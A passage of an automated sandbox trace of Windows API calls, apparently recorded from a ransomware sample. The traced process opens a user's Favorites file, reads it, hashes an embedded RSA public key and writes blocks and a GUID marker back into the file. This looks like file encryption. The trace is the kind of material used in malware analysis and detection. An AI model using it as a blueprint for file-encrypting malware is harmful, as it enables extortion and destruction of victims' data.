(in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.791] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201e90 | out: hHeap=0x660000) returned 1 [0059.792] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0059.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201e90 [0059.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.792] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned=".url" [0059.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.793] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.793] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.795] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.795] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.796] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.796] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.796] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.796] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.796] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.797] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.797] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.797] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.797] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.797] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.797] GetLastError () returned 0x0 [0059.797] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.797] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.797] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.798] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.798] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.798] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88448 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c858d8 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88490 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c858f0 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85920 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85938 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.798] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85920 | out: hHeap=0x660000) returned 1 [0059.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85938 | out: hHeap=0x660000) returned 1 [0059.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85938 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85920 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85938 | out: hHeap=0x660000) returned 1 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85920 | out: hHeap=0x660000) returned 1 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.799] GetCurrentThreadId () returned 0x9e0 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c84928 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.799] GetCurrentThreadId () returned 0x9e0 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85920 [0059.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85938 [0059.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85908 [0059.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0059.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85950 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85920 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85920 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85920 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85950 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85938 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85908 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c858f0 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88490 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.802] WriteFile (in: hFile=0x5cc, lpBuffer=0x32adb18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x32adb18*, lpNumberOfBytesWritten=0x9f4fb14*=0x80, lpOverlapped=0x0) returned 1 [0059.803] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.803] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.803] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.803] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0059.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.803] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.803] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0059.803] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.803] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.803] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.803] WriteFile (in: hFile=0x5cc, 